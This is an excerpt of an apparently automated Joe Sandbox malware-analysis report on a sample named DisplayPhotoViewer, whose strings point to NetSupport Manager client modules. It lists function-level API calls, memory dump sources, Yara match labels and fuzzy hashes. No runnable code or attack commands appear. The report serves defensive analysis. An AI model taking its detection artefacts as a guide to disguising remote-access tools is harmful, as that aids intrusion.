                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()
                                                                                                    • API String ID: 2441568934-3853199760
                                                                                                    • Opcode ID: a2eb115ba9540d227b9205d4ee598dc42295338310caab022904c2ac67b8dda4
                                                                                                    • Instruction ID: 4766b44ffffd3637aa5141de8ea0a6579cce8d9982359020827248907fd4bc2e
                                                                                                    • Opcode Fuzzy Hash: a2eb115ba9540d227b9205d4ee598dc42295338310caab022904c2ac67b8dda4
                                                                                                    • Instruction Fuzzy Hash: 34D0A77ED1522356DB905E58BC00FC9F3841B10918F0544A4A8A863140F560640149E6
                                                                                                    Function 111490F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 11149114
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11149103
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 111490FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 67735064-1557312927
                                                                                                    • Opcode ID: f4806a6b170e6d68b73ac520e2bbc478130269175368d1ed41f36626938baa4e
                                                                                                    • Instruction ID: 69880b9e368440187de976e2d976cf96132c519750e5c8975d6ae016b94abfcc
                                                                                                    • Opcode Fuzzy Hash: f4806a6b170e6d68b73ac520e2bbc478130269175368d1ed41f36626938baa4e
                                                                                                    • Instruction Fuzzy Hash: A7D02235E00236EBC3204A65FC09FC2B3885B88628F018828F05462480F370A4808B52
                                                                                                    Function 111076C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(00000000), ref: 111076E4
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                    • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                    • API String ID: 2400454052-4183089485
                                                                                                    • Opcode ID: 563f0a70dc4f407e8f6df031ae2e919b204dbe2557418ca53e67661f0fe668b6
                                                                                                    • Instruction ID: e351721592292f4709586c54cb2f77353b696b6dd3abde406f4da17dbbca92a6
                                                                                                    • Opcode Fuzzy Hash: 563f0a70dc4f407e8f6df031ae2e919b204dbe2557418ca53e67661f0fe668b6
                                                                                                    • Instruction Fuzzy Hash: 13D02236D80A219FC2608E24BC04FC3F3A44B04308F004438F04152008C6B0B80A8BB0
                                                                                                    Function 1101B9E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 1101BA04
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 1101B9F3
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B9EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1590435379-1557312927
                                                                                                    • Opcode ID: fb64fa728f2c43e70433468d9914a315ed6e7c22982b08f45fbaf93da515c0fd
                                                                                                    • Instruction ID: b67a6d32650203b374d0b5373d484308500d906e3c2362688951258105a8778a
                                                                                                    • Opcode Fuzzy Hash: fb64fa728f2c43e70433468d9914a315ed6e7c22982b08f45fbaf93da515c0fd
                                                                                                    • Instruction Fuzzy Hash: C3D02232D00A39ABC320BA25FC04FC2F2985B8820CF00C428F01566045E370A4808B82
                                                                                                    Function 107067E3 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00000000,00000000,107065AB,00000000,?,00000000,1070473E,?,00000000,?,00000000,10712290,?), ref: 1070680B
                                                                                                    • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,107065AB,00000000,?,00000000,1070473E,?,00000000,?,00000000,10712290,?), ref: 1070683F
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10706859
                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 10706870
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocHeap$FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3499195154-0
                                                                                                    • Opcode ID: 709fe02e81b37695d5508ff425ae79e8870fe0f926d09c57a02cc47aa5bf94ec
                                                                                                    • Instruction ID: 367536d9dac2c4aea5414f2b2014d0caa45500d6e774c15eb88ee46a40b6dae6
                                                                                                    • Opcode Fuzzy Hash: 709fe02e81b37695d5508ff425ae79e8870fe0f926d09c57a02cc47aa5bf94ec
                                                                                                    • Instruction Fuzzy Hash: 2B11E630A00721AFD7218F29CC85A167BB6FB8E754722C61DF251D61B4D7B1E84ACF58
                                                                                                    Function 1100D750 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(111E09EC,00000000,?,?,1100C11B,00000000,00000000), ref: 1100D75F
                                                                                                    • LeaveCriticalSection.KERNEL32(111E09EC,?,?,1100C11B,00000000,00000000), ref: 1100D7D0
                                                                                                      • Part of subcall function 1100D6C0: EnterCriticalSection.KERNEL32(111E09EC,1100CA2A,?,1100B42C,?,00000000,?,1100CA2A,?), ref: 1100D6C9
                                                                                                      • Part of subcall function 1100D6C0: LeaveCriticalSection.KERNEL32(111E09EC,1100B42C,?,00000000,?,1100CA2A,?), ref: 1100D741
                                                                                                    • LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D79F
                                                                                                    • LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D7BB
                                                                                                      • Part of subcall function 1100D670: EnterCriticalSection.KERNEL32(111E09EC,1100C3AB), ref: 1100D675
                                                                                                      • Part of subcall function 1100D670: LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D6AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 2978645861-0
                                                                                                    • Opcode ID: 084e88929c2c6b414e5802daaec412d187cbeba912188adf53b88c87e69f5829
                                                                                                    • Instruction ID: 8b078b0db15203191b709e0105c751c3fc8f219d4f3dc387ab5008aedd5a355a
                                                                                                    • Opcode Fuzzy Hash: 084e88929c2c6b414e5802daaec412d187cbeba912188adf53b88c87e69f5829
                                                                                                    • Instruction Fuzzy Hash: BE018475F12128ABE701DFE5AC49AADB7ACEB45699B0041A5FC0CD3604F631AD0187F1
                                                                                                    Function 10704070 Relevance: 5.0, APIs: 4, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40,?,74DF0F00,?,?,?,1070411C), ref: 10704082
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40,?,74DF0F00,?,?,?,1070411C), ref: 107040A2
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40), ref: 107040B9
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40), ref: 107040D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168844106-0
                                                                                                    • Opcode ID: 5527191b932816de92cf4a7d478a1e9fcacdbf90b2deed42ba8d816bfc6b5324
                                                                                                    • Instruction ID: ffe85afe4789b5ae5c789c616f9ee70ffb65d3267031d812c5b0442834dad8af
                                                                                                    • Opcode Fuzzy Hash: 5527191b932816de92cf4a7d478a1e9fcacdbf90b2deed42ba8d816bfc6b5324
                                                                                                    • Instruction Fuzzy Hash: 61F0F6B7B00229BBCB9097E5DCC4CABB36DDF4C5547058256FA0197350DA31ED0497E4
                                                                                                    Function 107078D2 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(?,10708676,?,10705C5B), ref: 107078DF
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 107078E7
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 107078EF
                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 107078F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 32694325-0
                                                                                                    • Opcode ID: b0d39deabf8d4d975ca34efdeaac535a4e03c9a3607b496eea7dbe72fdb05cf5
                                                                                                    • Instruction ID: 69a6f023eae0f05e5c9a12d275ba1d9ef83b7bef8444fc9361c797a52ffe6f16
                                                                                                    • Opcode Fuzzy Hash: b0d39deabf8d4d975ca34efdeaac535a4e03c9a3607b496eea7dbe72fdb05cf5
                                                                                                    • Instruction Fuzzy Hash: FDC002329010B8AECB122BE6FC8494A3FF6EB0C3A0325C163E104520B48E721C21EFD8